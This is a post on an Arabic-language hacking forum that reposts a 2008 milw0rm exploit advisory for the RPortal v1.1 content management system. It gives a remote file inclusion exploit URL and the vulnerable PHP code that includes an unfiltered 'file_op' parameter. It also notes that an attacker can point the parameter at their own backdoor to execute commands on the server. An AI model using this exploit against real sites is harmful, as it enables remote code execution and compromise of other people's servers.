top left
مـنـتـديـات مـنـظـمـة الاخـتــراق الـعـالـمـيــه
قديم منذ /10-02-2008, 02:11 AM   #1

SubSEven7II
 
الصورة الرمزية SubSEven7II
Supervisor-General

SubSEven7II غير متصل

 رقم العضوية : 102324
 تاريخ التسجيل : Mar 2008
 المشاركات : 2,108
 النقاط : SubSEven7II على طريق الإبداع

Downloads: 0
Uploads: 0
شكراً: 0
تم شكره 9 مرة في 7 مشاركة
افتراضي RPortal v 1.1

################################################## #######
#
# RPortal v1.1
#
#
# Rportal is a management system of contents simple and powerful Web,
# enabling you to create your site in a few minutes, while profiting
# from a complete and effective administration.
#
#
# Remote and Local File Inclusion Vulnerability <= 1.1
# Found the 29th September 2008

################################################## ########
# Author: Kad
#
# mail : kadfrox [ a ] gmail [ dot ] com
#
################################################## ########
#
# script : RPortal v 1.1
# http://www.rportal.org/?op=download&fid=36
#
################################################## ########

[~] Exploit :


http://www.site.com/index.php?file_op=[url]

#
# Vulnerable code source :
#

if(!isset($file_op))$file_op='';

if($file_op!="")

{
$op_basepath = trim(strrev(strstr(strrev($file_op),"/php/")));

if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath);

include($file_op);

}

# The problem is that the variable $file_op is not filtered
# Then, you can put the link that you want, like your own backdoor
# and execute commands.

# milw0rm.com [2008-10-01]







::/توقـيـع/:: SubSEven7II

[CENTER][URL=http://up107.arabsh.com/][IMG]http://up107.arabsh.com/s/1i8lrgtjq9.gif[/IMG][/URL][IMG]http://mlfnt.net/up/files/bii0pjgedib0zu2i30k4.gif[/IMG][/CENTER]
  رد مع اقتباس
رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة



 

الساعة الآن 02:53 PM.
تعريب و ترقية أستايل HoStVb.NeT
Powered by: vBulletin Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
مـنـتـديـات مـنـظـمـة الاخـتــراق الـعـالـمـيــه

 

 

 

top right